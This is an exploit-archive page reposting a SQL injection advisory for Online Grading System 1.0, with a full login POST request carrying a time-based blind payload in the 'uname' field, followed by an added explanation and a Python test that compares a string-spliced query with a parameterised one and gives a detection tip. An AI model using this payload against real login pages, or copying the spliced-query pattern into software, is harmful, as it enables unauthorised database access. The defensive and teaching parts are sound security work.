Online Grading System 1.0 SQL Injection

CVE             Category   Price   Severity
CVE-XXXX-XXXX   CWE-89     $500    Critical

Author    Risk   Exploitation Type   Date
Unknown   High   Remote              2021-01-30

CVSS                                             EPSS      EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H     0.02192   0.50148

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021010199

Below is a copy:

Online Grading System 1.0 SQL Injection
# Exploit Title: Online Grading System 1.0 - 'uname' SQL Injection
# Date: 2021-01-28
# Exploit Author: Ruchi Tiwari
# Vendor Homepage: https://www.sourcecodester.com/php/13711/online-grading-system-using-phpmysqli.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/onlinegradingsystem.zip
# Version: 1.0
# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4

---------------------------------------------------------------------------------

# Vulnerable parameter: uname
# Injected request
POST /onlinegradingsystem/admin/login.php HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 122
Origin: http://localhost:8080
Connection: close
Referer: http://localhost:8080/onlinegradingsystem/admin/login.php
Cookie: PHPSESSID=mavnqgmmv1o0vtqld99vtdv1us
Upgrade-Insecure-Requests: 1

uname=ruchi'||(SELECT 0x4375526c WHERE 6468=6468 AND (SELECT 4401 FROM (SELECT(SLEEP(20)))ariq))||'&pass=admin&btnlogin=

# Application will load after 20 minutes.
--------------------------------------------------------------------------------------------------------------------
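The request above is a time-based blind injection: the quote in `uname` closes the string literal the login query built around it, and the rest of the value is parsed as SQL, so the server blocks inside `SLEEP()` (whose argument MySQL interprets in seconds) before answering. The example below is added here and is not code from the advisory or from the Online Grading System project. It assumes, as is usual for this class of bug, that `admin/login.php` splices `uname` and `pass` into the query text; it replays the captured form body against that pattern and against a parameterised query. SQLite stands in for MySQL, with `SLEEP` registered as a Python function that records calls instead of blocking, so the test observes whether attacker-supplied SQL executed at all. Table and column names are constructed.

```python
import sqlite3
from urllib.parse import parse_qs

# Constructed copy of the form body from the advisory's injected request.
CAPTURED_BODY = (
    "uname=ruchi'||(SELECT 0x4375526c WHERE 6468=6468 AND "
    "(SELECT 4401 FROM (SELECT(SLEEP(20)))ariq))||'&pass=admin&btnlogin="
)

# Every call the database makes to SLEEP() lands here; in MySQL each call
# would stall the request for that many seconds.
SLEEP_CALLS = []


def fake_sleep(seconds):
    # Stand-in for MySQL SLEEP(): record the call, return immediately.
    SLEEP_CALLS.append(seconds)
    return 0


def make_db():
    # Fresh in-memory database with one constructed admin account.
    conn = sqlite3.connect(":memory:")
    conn.create_function("SLEEP", 1, fake_sleep)
    conn.execute(
        "CREATE TABLE admin (id INTEGER PRIMARY KEY, uname TEXT, passwd TEXT)"
    )
    conn.execute("INSERT INTO admin (uname, passwd) VALUES ('admin', 'admin')")
    return conn


def login_vulnerable(conn, uname, passwd):
    # Assumed vulnerable pattern: user input spliced into the SQL text.
    # The ' in uname closes the literal, and everything after it is SQL.
    sql = f"SELECT id FROM admin WHERE uname='{uname}' AND passwd='{passwd}'"
    return conn.execute(sql).fetchone() is not None


def login_fixed(conn, uname, passwd):
    # Hardened form: placeholders keep the whole value a string, so the
    # payload is compared literally and no SLEEP() is ever evaluated.
    sql = "SELECT id FROM admin WHERE uname=? AND passwd=?"
    return conn.execute(sql, (uname, passwd)).fetchone() is not None


def run_probe(login):
    # Replay the captured body through the given login implementation and
    # report whether the attacker's SLEEP() ran and whether login succeeded.
    SLEEP_CALLS.clear()
    fields = parse_qs(CAPTURED_BODY)
    uname, passwd = fields["uname"][0], fields["pass"][0]
    conn = make_db()
    authenticated = login(conn, uname, passwd)
    return {"authenticated": authenticated, "sleep_calls": len(SLEEP_CALLS)}


if __name__ == "__main__":
    print("vulnerable:", run_probe(login_vulnerable))  # sleep_calls >= 1
    print("fixed:     ", run_probe(login_fixed))       # sleep_calls == 0
```

One dialect caveat: in SQLite `||` is string concatenation, whereas in MySQL it is logical OR unless `PIPES_AS_CONCAT` is set, so the row-matching result of the captured payload differs between the two; what the run shows either way is that the concatenated query hands the injected subquery to the database and the parameterised one does not. For detection, the observable on the wire is the same as in the advisory: a login request whose response time tracks the `SLEEP()` argument rather than normal server latency.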

Copyright ©2024 Exploitalert.
